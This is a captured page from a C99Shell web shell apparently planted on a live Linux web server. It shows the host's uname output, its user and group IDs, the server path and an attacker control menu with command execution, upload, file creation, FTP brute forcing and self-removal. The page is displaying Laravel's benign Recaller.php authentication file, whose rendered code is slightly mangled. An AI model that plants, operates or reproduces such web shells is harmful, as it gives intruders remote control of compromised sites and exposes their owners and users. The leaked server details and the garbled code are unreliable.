!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/wataxi.picotech.app/public_html/vendor/laravel/framework/src/Illuminate/Auth/   drwxr-xr-x
Free 28.69 GB of 117.98 GB (24.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Recaller.php (1.7 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Auth;

use 
Illuminate\Support\Str;

class 
Recaller
{
    
/**
     * The "recaller" / "remember me" cookie string.
     *
     * @var string
     */
    
protected $recaller;

    
/**
     * Create a new recaller instance.
     *
     * @param  string  $recaller
     * @return void
     */
    
public function __construct($recaller)
    {
        
$this->recaller = @unserialize($recaller, ['allowed_classes' => false]) ?: $recaller;
    }

    
/**
     * Get the user ID from the recaller.
     *
     * @return string
     */
    
public function id()
    {
        return 
explode('|'$this->recaller3)[0];
    }

    
/**
     * Get the "remember token" token from the recaller.
     *
     * @return string
     */
    
public function token()
    {
        return 
explode('|'$this->recaller3)[1];
    }

    
/**
     * Get the password from the recaller.
     *
     * @return string
     */
    
public function hash()
    {
        return 
explode('|'$this->recaller3)[2];
    }

    
/**
     * Determine if the recaller is valid.
     *
     * @return bool
     */
    
public function valid()
    {
        return 
$this->properString() && $this->hasAllSegments();
    }

    
/**
     * Determine if the recaller is an invalid string.
     *
     * @return bool
     */
    
protected function properString()
    {
        return 
is_string($this->recaller) && Str::contains($this->recaller'|');
    }

    
/**
     * Determine if the recaller has all segments.
     *
     * @return bool
     */
    
protected function hasAllSegments()
    {
        
$segments explode('|'$this->recaller);

        return 
count($segments) === && trim($segments[0]) !== '' && trim($segments[1]) !== '';
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0058 ]--